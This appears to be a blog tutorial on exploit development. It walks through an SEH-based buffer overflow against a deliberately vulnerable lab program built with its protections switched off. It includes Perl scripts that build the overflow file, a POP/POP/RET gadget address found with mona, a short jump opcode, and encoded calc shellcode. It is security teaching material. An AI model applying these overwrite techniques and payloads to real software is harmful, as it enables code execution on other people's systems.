Exploit Development 2: SEH buffer overflow

This time we’re going to take a closer look at SEH (Structured Exception Handling) based exploits.

Setup

Compile the executable and library with the following options set:

 /GS- /DYNAMICBASE:NO /NXCOMPAT:NO /SAFESEH:NO 

Analysis

The idea is basically to overwrite the pointer to the exception handler and make it point to your injected shellcode. After an exception is triggered the hijacked exception handler is executed.

Microsoft introduced the SafeSEH mitigation in Windows XP SP2. Most OS libraries were recompiled to support the new mitigation.

SafeSEH enabled libraries have a list of trusted exception handlers. The OS will prevent jumping to code in the library when it cannot verify that the jump is originating from a trusted location.

Therefore we will most likely be dependent on application DLL’s that were not compiled with the SafeSEH option.

The first step will be to determine where the NextSEH and SEH entries are located on the stack.

Use the following script:


my $file = "attack_test.txt";

my $overflow = "0123456789ABCDEF";
my $eip = "AAAA";

open($FILE,">$file");
print $FILE $overflow.$eip;
close($FILE);
print "File created\n";

Set a breakpoint at 0x004010F6 and check the stack and the SEH chain.

2-sehchain

In order to get to the “Pointer to next SEH record” we have to overwrite 52 bytes (0x0012FF7C + 0x34 = 0x0012FFB0) and then we can overwrite the “Pointer to next SEH record” and the “SE handler”.

As you may already have read in papers and articles regarding SEH based exploits, it is necessary to find a memory location comprised of a sequence of POP/POP/RET instructions and put its address at the location of the SE handler. When an exception occurs (it will because we cause an access violation) the OS will jump to this address. By executing the POP/POP/RET sequence the program flow is passed to the address where the next SEH record is located (0x0012FFB0).

Mona will help us obtaining POP/POP/RET sequences:

!mona seh

We will use an address from the application DLL where SafeSEH was disabled:


0x123418d4 : pop esi # pop ebx # ret  |  {PAGE_EXECUTE_READ} [ExploitLib.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\_Work\SEH\ExploitLib.dll)

The next step will be to store a jump instruction at the next SEH record, which will jump over the POP/POP/RET sequence we inserted before and eventually point straight to the beginning of the shellcode. The opcode sequence 0xEB 0x06 0x90 0x90 will exactly do this. It jumps over 6 bytes (2 NOP’s and the next instruction with a length of 4 bytes).

Exploit

Append the encoded shellcode we generated in the previous tutorial and we’re ready to go:


my $file = "attack_test.txt";

my $overflow = "0123456789ABCDEF";
my $eip = "AAAA";
my $fill = "B" x 52;

my $nextseh = "\xeb\x06\x90\x90";
my $seh = pack('V',0x123418D4);

my $shellcode_calc_encoded =
"\xda\xc1\xbd\xdc\x21\x52\x41\xd9\x74\x24\xf4\x58\x2b\xc9" .
"\xb1\x05\x83\xe8\xfc\x31\x68\x13\x03\xb4\x32\xb0\xb4\x75" .
"\xfc\x65\x5f\x16\x9f\xe9\xfc\x8c\xe7\x82\x12\x60\x18\x9c" .
"\xc3";

open($FILE,">$file");
print $FILE $overflow.$eip.$fill.$nextseh.$seh.$shellcode_calc_encoded;
close($FILE);
print "File created\n";

Run the script and enjoy the exploit in action!

2-exploit

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s